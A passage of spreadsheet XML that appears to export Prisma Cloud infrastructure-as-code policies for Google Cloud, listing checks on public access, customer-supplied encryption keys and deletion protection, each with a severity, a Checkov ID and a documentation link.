      <c r="L961" t="inlineStr"/>
      <c r="M961" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N961" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O961" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P961" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q961" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R961" t="inlineStr">
        <is>
          <t>5.1.1 Config - Other</t>
        </is>
      </c>
      <c r="S961" t="inlineStr"/>
      <c r="T961" t="b">
        <v>0</v>
      </c>
      <c r="U961" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V961" t="inlineStr">
        <is>
          <t>IaC:General:google-artifact-registry-repository-iam-binding,google-artifact-registry-repository-iam-member</t>
        </is>
      </c>
      <c r="W961" t="inlineStr">
        <is>
          <t>Ensure that Artifact Registry repositories are not anonymously or publicly accessible</t>
        </is>
      </c>
      <c r="X961" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-artifact-registry-repository-is-not-anonymously-or-publicly-accessible</t>
        </is>
      </c>
      <c r="Y961" t="inlineStr"/>
      <c r="Z961" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_artifact_registry_repository_iam_binding", "google_artifact_registry_repository_iam_member"]}</t>
        </is>
      </c>
      <c r="AA961" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB961" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC961" t="inlineStr">
        <is>
          <t>CKV_GCP_101</t>
        </is>
      </c>
      <c r="AD961" t="b">
        <v>1</v>
      </c>
      <c r="AE961" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF961" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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1" t="inlineStr">
        <is>
          <t>8c238bd3-9898-4cee-878f-99874eafd326</t>
        </is>
      </c>
      <c r="AI961" t="inlineStr"/>
      <c r="AJ961" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK961" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="962">
      <c r="A962" t="inlineStr"/>
      <c r="B962" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C962" s="2" t="inlineStr"/>
      <c r="D962" t="inlineStr"/>
      <c r="E962" t="inlineStr"/>
      <c r="F962" t="inlineStr"/>
      <c r="G962" t="b">
        <v>1</v>
      </c>
      <c r="H9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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J962" t="inlineStr">
        <is>
          <t>IaC:General:google-bigquery</t>
        </is>
      </c>
      <c r="K962" t="inlineStr">
        <is>
          <t>GCP Big Query Datasets are not encrypted with Customer Supplied Encryption Keys (CSEK)</t>
        </is>
      </c>
      <c r="L962" t="inlineStr"/>
      <c r="M962" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N962" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O962" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P962" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q962" t="inlineStr"/>
      <c r="R962" t="inlineStr"/>
      <c r="S962" t="inlineStr"/>
      <c r="T962" t="b">
        <v>0</v>
      </c>
      <c r="U962" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V962" t="inlineStr">
        <is>
          <t>IaC:General:google-bigquery-dataset</t>
        </is>
      </c>
      <c r="W962" t="inlineStr">
        <is>
          <t>Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK)</t>
        </is>
      </c>
      <c r="X962" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek-1</t>
        </is>
      </c>
      <c r="Y962" t="inlineStr"/>
      <c r="Z962" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_bigquery_dataset"]}</t>
        </is>
      </c>
      <c r="AA962" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB962" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC962" t="inlineStr">
        <is>
          <t>CKV_GCP_81</t>
        </is>
      </c>
      <c r="AD962" t="b">
        <v>1</v>
      </c>
      <c r="AE962" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF962" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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2" t="inlineStr">
        <is>
          <t>0993e534-88c1-40c2-913b-0d10c8806c52</t>
        </is>
      </c>
      <c r="AI962" t="inlineStr"/>
      <c r="AJ962" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK962" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="963">
      <c r="A963" t="inlineStr"/>
      <c r="B963" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C963" s="2" t="inlineStr"/>
      <c r="D963" t="inlineStr"/>
      <c r="E963" t="inlineStr"/>
      <c r="F963" t="inlineStr"/>
      <c r="G963" t="b">
        <v>1</v>
      </c>
      <c r="H9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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J963" t="inlineStr">
        <is>
          <t>IaC:General:google-bigquery</t>
        </is>
      </c>
      <c r="K963" t="inlineStr">
        <is>
          <t>GCP Big Query Tables are not encrypted with Customer Supplied Encryption Keys (CSEK)</t>
        </is>
      </c>
      <c r="L963" t="inlineStr"/>
      <c r="M963" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N963" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O963" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P963" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q963" t="inlineStr"/>
      <c r="R963" t="inlineStr"/>
      <c r="S963" t="inlineStr"/>
      <c r="T963" t="b">
        <v>0</v>
      </c>
      <c r="U963" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V963" t="inlineStr">
        <is>
          <t>IaC:General:google-bigquery-table</t>
        </is>
      </c>
      <c r="W963" t="inlineStr">
        <is>
          <t>Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK)</t>
        </is>
      </c>
      <c r="X963" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek</t>
        </is>
      </c>
      <c r="Y963" t="inlineStr"/>
      <c r="Z963" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_bigquery_table"]}</t>
        </is>
      </c>
      <c r="AA963" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB963" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC963" t="inlineStr">
        <is>
          <t>CKV_GCP_80</t>
        </is>
      </c>
      <c r="AD963" t="b">
        <v>1</v>
      </c>
      <c r="AE963" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF963" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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3" t="inlineStr">
        <is>
          <t>a87cc89c-014f-43c0-9e4c-b77776ed96d4</t>
        </is>
      </c>
      <c r="AI963" t="inlineStr"/>
      <c r="AJ963" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK963" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="964">
      <c r="A964" t="inlineStr"/>
      <c r="B964" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C964" s="2" t="inlineStr"/>
      <c r="D964" t="inlineStr"/>
      <c r="E964" t="inlineStr"/>
      <c r="F964" t="inlineStr"/>
      <c r="G964" t="b">
        <v>1</v>
      </c>
      <c r="H9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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J964" t="inlineStr">
        <is>
          <t>IaC:General:google-bigquery</t>
        </is>
      </c>
      <c r="K964" t="inlineStr">
        <is>
          <t>BigQuery tables do not have deletion protection enabled</t>
        </is>
      </c>
      <c r="L964" t="inlineStr"/>
      <c r="M964" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N964" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O964" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P964" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q964" t="inlineStr"/>
      <c r="R964" t="inlineStr"/>
      <c r="S964" t="inlineStr"/>
      <c r="T964" t="b">
        <v>0</v>
      </c>
      <c r="U964" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V964" t="inlineStr">
        <is>
          <t>IaC:General:google-bigquery-table</t>
        </is>
      </c>
      <c r="W964" t="inlineStr">
        <is>
          <t>Ensure BigQuery tables have deletion protection enabled</t>
        </is>
      </c>
      <c r="X964" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-google-cloud-121</t>
        </is>
      </c>
      <c r="Y964" t="inlineStr"/>
      <c r="Z964" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_bigquery_table"]}</t>
        </is>
      </c>
      <c r="AA964" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB964" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC964" t="inlineStr">
        <is>
          <t>CKV_GCP_121</t>
        </is>
      </c>
      <c r="AD964" t="b">
        <v>1</v>
      </c>
      <c r="AE964" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF964" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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4" t="inlineStr">
        <is>
          <t>a3a3dac2-77be-44e1-ad09-641edc789dab</t>
        </is>
      </c>
      <c r="AI964" t="inlineStr"/>
      <c r="AJ964" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK964" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="965">
      <c r="A965" t="inlineStr"/>
      <c r="B965" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C965" s="2" t="inlineStr"/>
      <c r="D965" t="inlineStr"/>
      <c r="E965" t="inlineStr"/>
      <c r="F965" t="inlineStr"/>
      <c r="G965" t="b">
        <v>1</v>
      </c>
      <c r="H9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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J965" t="inlineStr">
        <is>
          <t>IaC:General:google-bigquery</t>
        </is>
      </c>
      <c r="K965" t="inlineStr">
        <is>
          <t>GCP BigQuery Tables are anonymously or publicly accessible</t>
        </is>
      </c>
      <c r="L965" t="inlineStr"/>
      <c r="M965" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N965" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O965" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P965" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q965" t="inlineStr"/>
      <c r="R965" t="inlineStr"/>
      <c r="S965" t="inlineStr"/>
      <c r="T965" t="b">
        <v>0</v>
      </c>
      <c r="U965" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V965" t="inlineStr">
        <is>
          <t>IaC:General:google-bigquery-table-iam-member,google-bigquery-table-iam-binding</t>
        </is>
      </c>
      <c r="W965" t="inlineStr">
        <is>
          <t>Ensure that BigQuery Tables are not anonymously or publicly accessible</t>
        </is>
      </c>
      <c r="X965" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-gcp-bigquery-table-is-not-publicly-accessible</t>
        </is>
      </c>
      <c r="Y965" t="inlineStr"/>
      <c r="Z965" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_bigquery_table_iam_member", "google_bigquery_table_iam_binding"]}</t>
        </is>
      </c>
      <c r="AA965" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB965" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC965" t="inlineStr">
        <is>
          <t>CKV_GCP_100</t>
        </is>
      </c>
      <c r="AD965" t="b">
        <v>1</v>
      </c>
      <c r="AE965" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF965" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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5" t="inlineStr">
        <is>
          <t>bdb9b829-d0ef-425f-839d-7f9ff9a99f25</t>
        </is>
      </c>
      <c r="AI965" t="inlineStr"/>
      <c r="AJ965" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK965" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="966">
      <c r="A966" t="inlineStr"/>
      <c r="B966" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C966" s="2" t="inlineStr"/>
      <c r="D966" t="inlineStr"/>
      <c r="E966" t="inlineStr"/>
      <c r="F966" t="inlineStr"/>
      <c r="G966" t="b">
        <v>1</v>
      </c>
      <c r="H9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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J966" t="inlineStr">
        <is>
          <t>IaC:General:google-bigtable</t>
        </is>
      </c>
      <c r="K966" t="inlineStr">
        <is>
          <t>GCP Big Table Instances are not encrypted with Customer Supplied Encryption Keys (CSEKs)</t>
        </is>
      </c>
      <c r="L966" t="inlineStr"/>
      <c r="M966" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N966" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O966" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P966" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q966" t="inlineStr"/>
      <c r="R966" t="inlineStr"/>
      <c r="S966" t="inlineStr"/>
      <c r="T966" t="b">
        <v>0</v>
      </c>
      <c r="U966" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V966" t="inlineStr">
        <is>
          <t>IaC:General:google-bigtable-instance</t>
        </is>
      </c>
      <c r="W966" t="inlineStr">
        <is>
          <t>Ensure Big Table Instances are encrypted with Customer Supplied Encryption Keys (CSEK)</t>
        </is>
      </c>
      <c r="X966" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-table-instances-are-encrypted-with-customer-supplied-encryption-keys-cseks</t>
        </is>
      </c>
      <c r="Y966" t="inlineStr"/>
      <c r="Z966" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_bigtable_instance"]}</t>
        </is>
      </c>
      <c r="AA966" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB966" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC966" t="inlineStr">
        <is>
          <t>CKV_GCP_85</t>
        </is>
      </c>
      <c r="AD966" t="b">
        <v>1</v>
      </c>
      <c r="AE966" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF966" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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6" t="inlineStr">
        <is>
          <t>8e588018-92ea-40f2-a5fe-ad8ccc030b65</t>
        </is>
      </c>
      <c r="AI966" t="inlineStr"/>
      <c r="AJ966" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK966" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="967">
      <c r="A967" t="inlineStr"/>
      <c r="B967" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C967" s="2" t="inlineStr"/>
      <c r="D967" t="inlineStr"/>
      <c r="E967" t="inlineStr"/>
      <c r="F967" t="inlineStr"/>
      <c r="G967" t="b">
        <v>1</v>
      </c>
      <c r="H9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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J967" t="inlineStr">
        <is>
          <t>IaC:General:google-bigtable</t>
        </is>
      </c>
      <c r="K967" t="inlineStr">
        <is>
          <t>Big Table Instances do not have deletion protection enabled</t>
        </is>
      </c>
      <c r="L967" t="inlineStr"/>
      <c r="M967" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N967" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O967" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P967" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q967" t="inlineStr"/>
      <c r="R967" t="inlineStr"/>
      <c r="S967" t="inlineStr"/>
      <c r="T967" t="b">
        <v>0</v>
      </c>
      <c r="U967" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V967" t="inlineStr">
        <is>
          <t>IaC:General:google-bigtable-instance</t>
        </is>
      </c>
      <c r="W967" t="inlineStr">
        <is>
          <t>Ensure Big Table Instances have deletion protection enabled</t>
        </is>
      </c>
      <c r="X967" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-google-cloud-122</t>
        </is>
      </c>
      <c r="Y967" t="inlineStr"/>
      <c r="Z967" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_bigtable_instance"]}</t>
        </is>
      </c>
      <c r="AA967" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB967" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC967" t="inlineStr">
        <is>
          <t>CKV_GCP_122</t>
        </is>
      </c>
      <c r="AD967" t="b">
        <v>1</v>
      </c>
      <c r="AE967" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF967" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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7" t="inlineStr">
        <is>
          <t>a81af0fe-3ebc-49b9-9265-7f70409da07c</t>
        </is>
      </c>
      <c r="AI967" t="inlineStr"/>
      <c r="AJ967" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK967" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="968">
      <c r="A968" t="inlineStr"/>
      <c r="B968" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C968" s="2" t="inlineStr"/>
      <c r="D968" t="inlineStr"/>
      <c r="E968" t="inlineStr"/>
      <c r="F968" t="inlineStr"/>
      <c r="G968" t="b">
        <v>1</v>
      </c>
      <c r="H9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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J968" t="inlineStr">
        <is>
          <t>IaC:General:google-cloud-run</t>
        </is>
      </c>
      <c r="K968" t="inlineStr">
        <is>
          <t>GCP Cloud Run services are anonymously or publicly accessible</t>
        </is>
      </c>
      <c r="L968" t="inlineStr"/>
      <c r="M968" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N968" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O968" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P968" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q968" t="inlineStr"/>
      <c r="R968" t="inlineStr"/>
      <c r="S968" t="inlineStr"/>
      <c r="T968" t="b">
        <v>0</v>
      </c>
      <c r="U968" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V968" t="inlineStr">
        <is>
          <t>IaC:General:google-cloud-run-service-iam-binding,google-cloud-run-service-iam-member</t>
        </is>
      </c>
      <c r="W968" t="inlineStr">
        <is>
          <t>Ensure that GCP Cloud Run services are not anonymously or publicly accessible</t>
        </is>
      </c>
      <c r="X968" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-cloud-run-service-is-not-anonymously-or-publicly-accessible</t>
        </is>
      </c>
      <c r="Y968" t="inlineStr"/>
      <c r="Z968" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_cloud_run_service_iam_binding", "google_cloud_run_service_iam_member"]}</t>
        </is>
      </c>
      <c r="AA968" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB968" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC968" t="inlineStr">
        <is>
          <t>CKV_GCP_102</t>
        </is>
      </c>
      <c r="AD968" t="b">
        <v>1</v>
      </c>
      <c r="AE968" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF968" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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8" t="inlineStr">
        <is>
          <t>5c1b1e3a-02d4-45d7-bbcd-a6bc17bc38dd</t>
        </is>
      </c>
      <c r="AI968" t="inlineStr"/>
      <c r="AJ968" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK968" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="969">
      <c r="A969" t="inlineStr"/>
      <c r="B969" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C969" s="2" t="inlineStr"/>
      <c r="D969" t="inlineStr"/>
      <c r="E969" t="inlineStr"/>
      <c r="F969" t="inlineStr"/>
      <c r="G969" t="b">
        <v>1</v>
      </c>
      <c r="H9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69" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J969" t="inlineStr">
        <is>
          <t>IaC:General:google-cloudbuild</t>
        </is>
      </c>
      <c r="K969" t="inlineStr">
        <is>
          <t>GCP cloud build workers are not private</t>
        </is>
      </c>
      <c r="L969" t="inlineStr"/>
      <c r="M969" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N969" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O969" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P969" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q969" t="inlineStr"/>
      <c r="R969" t="inlineStr"/>
      <c r="S969" t="inlineStr"/>
      <c r="T969" t="b">
        <v>0</v>
      </c>
      <c r="U969" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V969" t="inlineStr">
        <is>
          <t>IaC:General:google-cloudbuild-worker-pool</t>
        </is>
      </c>
      <c r="W969" t="inlineStr">
        <is>
          <t>Ensure Cloud build workers are private</t>
        </is>
      </c>
      <c r="X969" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-cloud-build-workers-are-private</t>
        </is>
      </c>
      <c r="Y969" t="inlineStr"/>
      <c r="Z969" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_cloudbuild_worker_pool"]}</t>
        </is>
      </c>
      <c r="AA969" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB969" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC969" t="inlineStr">
        <is>
          <t>CKV_GCP_86</t>
        </is>
      </c>
      <c r="AD969" t="b">
        <v>1</v>
      </c>
      <c r="AE969" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF969" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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69" t="inlineStr">
        <is>
          <t>954e7d8e-bbb5-427f-a43b-266552d37b56</t>
        </is>
      </c>
      <c r="AI969" t="inlineStr"/>
      <c r="AJ969" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK969" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="970">
      <c r="A970" t="inlineStr"/>
      <c r="B970" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C970" s="2" t="inlineStr"/>
      <c r="D970" t="inlineStr"/>
      <c r="E970" t="inlineStr"/>
      <c r="F970" t="inlineStr"/>
      <c r="G970" t="b">
        <v>1</v>
      </c>
      <c r="H9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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J970" t="inlineStr">
        <is>
          <t>IaC:General:google-compute</t>
        </is>
      </c>
      <c r="K970" t="inlineStr">
        <is>
          <t>Boot disks for instances do not use CSEKs</t>
        </is>
      </c>
      <c r="L970" t="inlineStr"/>
      <c r="M970" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N970" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O970" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P970" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q970" t="inlineStr"/>
      <c r="R970" t="inlineStr"/>
      <c r="S970" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T970" t="b">
        <v>0</v>
      </c>
      <c r="U970" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V970" t="inlineStr">
        <is>
          <t>IaC:General:google-compute-instance</t>
        </is>
      </c>
      <c r="W970" t="inlineStr">
        <is>
          <t>Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK)</t>
        </is>
      </c>
      <c r="X970" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/encrypt-boot-disks-for-instances-with-cseks</t>
        </is>
      </c>
      <c r="Y970" t="inlineStr"/>
      <c r="Z970" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_compute_instance"]}</t>
        </is>
      </c>
      <c r="AA970" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB970" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC970" t="inlineStr">
        <is>
          <t>CKV_GCP_38</t>
        </is>
      </c>
      <c r="AD970" t="b">
        <v>1</v>
      </c>
      <c r="AE970" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF970" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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0" t="inlineStr">
        <is>
          <t>1d7dcc71-2237-45ca-8ec3-7f8e71eb8444</t>
        </is>
      </c>
      <c r="AI970" t="inlineStr"/>
      <c r="AJ970" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK970" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="971">
      <c r="A971" t="inlineStr"/>
      <c r="B971" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C971" s="2" t="inlineStr"/>
      <c r="D971" t="inlineStr"/>
      <c r="E971" t="inlineStr"/>
      <c r="F971" t="inlineStr"/>
      <c r="G971" t="b">
        <v>1</v>
      </c>
      <c r="H9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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J971" t="inlineStr">
        <is>
          <t>IaC:General:google-data</t>
        </is>
      </c>
      <c r="K971" t="inlineStr">
        <is>
          <t>GCP data fusion instances are not private</t>
        </is>
      </c>
      <c r="L971" t="inlineStr"/>
      <c r="M971" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N971" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
